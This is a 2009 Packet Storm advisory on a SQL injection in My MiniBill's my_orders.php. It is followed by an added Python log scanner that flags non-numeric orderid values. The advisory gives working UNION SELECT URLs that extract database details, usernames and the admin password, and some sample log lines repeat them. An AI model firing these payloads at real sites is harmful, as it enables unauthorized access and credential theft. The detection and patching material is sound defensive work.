My Mini Bill SQL Injection

2009-06-04T00:00:00
ID PACKETSTORM:78069
Type packetstorm
Reporter ThE g0bL!N
Modified 2009-06-04T00:00:00

Description

`My MiniBill (my_orders.php) Remote SQL Injection  
Founder: ThE g0bL!N  
------  
Home: http:/www.4ckx.com/dz/  
----  
Vendor: http://cupidsystems.com  
------  
More info: http://cupidsystems.com/products/myminibill/index.php  
--------  
Note: You must first register on the site at [path]/register.php  
Then go to the exploit:  
------------------  
http://victim/[path]/my_orders.php?action=status&orderid=-68+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9--  
Login Information:  
-----------------  
For:  
username: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,username,5,6,7,8,9+from+dbminibill.tblorders+limit+0,1  
Password: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,adminpassword,5,6,7,8,9+from+tblgeneral  
Demo:  
http://cupidsystems.com/products/myminibill/demo/  
Note: Algeria at the World Cup, In shaa Allah*  
################################################################################################  
`
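
The injection point described above is the orderid parameter of my_orders.php, so a defender can flag any request whose orderid is not a plain integer. The Python script below is an added example, not part of the original advisory or the vendor's code; the combined access-log format, the /shop/ path, the sample log lines and the assumption that valid order ids are positive integers are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate order id is a short run of digits and nothing else.
ORDERID_OK = re.compile(r"[0-9]{1,10}")

def bad_orderids(target):
    """Return orderid values sent to my_orders.php that are not plain integers."""
    parts = urlsplit(target)
    if not parts.path.endswith("/my_orders.php"):
        return []
    # parse_qs decodes %xx and turns '+' into spaces, as PHP does for $_GET.
    values = parse_qs(parts.query, keep_blank_values=True).get("orderid", [])
    return [v for v in values if not ORDERID_OK.fullmatch(v)]

def scan(lines):
    """Return (client_ip, offending_value) for each request that fails the check."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for value in bad_orderids(m.group(1)):
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Jun/2009:10:00:01 +0000] "GET /shop/my_orders.php?action=status&orderid=68 HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/Jun/2009:10:00:05 +0000] "GET /shop/my_orders.php?action=status&orderid=-68+union+select+1,2,3,user(),5,6,7,8,9-- HTTP/1.1" 200 498',
    '198.51.100.7 - - [04/Jun/2009:10:00:09 +0000] "GET /shop/my_orders.php?action=status&orderid=68%20UNION%20SELECT%201 HTTP/1.1" 200 498',
    '192.0.2.10 - - [04/Jun/2009:10:00:12 +0000] "GET /shop/register.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent non-numeric orderid: {value!r}")
```

The same allow-list check, applied in the application before the value reaches the query and combined with a parameterized query, is the corresponding fix.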